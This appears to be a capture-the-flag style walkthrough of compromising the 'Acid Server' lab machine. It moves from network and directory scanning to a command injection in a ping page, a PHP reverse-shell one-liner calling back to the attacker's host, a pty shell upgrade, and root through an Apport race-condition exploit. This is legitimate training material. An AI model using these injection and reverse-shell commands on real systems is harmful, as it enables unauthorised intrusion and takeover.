Acid Server
Tools:
- netdiscover
- Nmap
- Wfuzz
- DirBuster
- Burp
Vulnerabilities:
Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation
Use netdiscover to detect target IP address
netdiscover -i eth0 -r 192.168.41.0/24
192.168.41.170is the target.
Then run nmap to detect opening ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.41.170 -p-
port 33447 is open and running http service.
run wfuzz,
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.41.170:33447/FUZZ 2>/dev/null
find a path Challenge
use DirBuster, check http://192.168.41.170:33447/Challenge/
Check cake.php
check source code,
find /Magic_Box may be a hidden path
use DirBuster again,
command.php looks interesting.
check that page:
type 127.0.0.1 and use Burp
looks like it pings the IP address I typed
<img src="/images/blog/vulhub/acid_server/Selection_010.png" title="[title manually exploit [alt text]]" >
now try 127.0.0.1;id
<img src="/images/blog/vulhub/acid_server/Selection_011.png" title="[title manually exploit [alt text]]" >
works. So there is a command injection vulnerability.
In burp, instead of id command, using (URL encode):
php -r '$sock=fsockopen("192.168.41.149",443);exec("/bin/sh -i <&3 >&3 2>&3");'
get the shell
<img src="/images/blog/vulhub/acid_server/Selection_012.png" title="[title manually exploit [alt text]]" >
python -c 'import pty; pty.spawn("/bin/bash")'
after some enumeration
cat /etc/*-release
<img src="/images/blog/vulhub/acid_server/Selection_013.png" title="[title manually exploit [alt text]]" >
Target is running Ubuntu 15.04
earchsploit ubuntu | grep 15.04
<img src="/images/blog/vulhub/acid_server/Selection_014.png" title="[title manually exploit [alt text]]" >
Since the target doesn’t have wget and gcc, I setup ftp srever and compile the code locally and upload it.
get root
<img src="/images/blog/vulhub/acid_server/Selection_015.png" title="[title manually exploit [alt text]]" >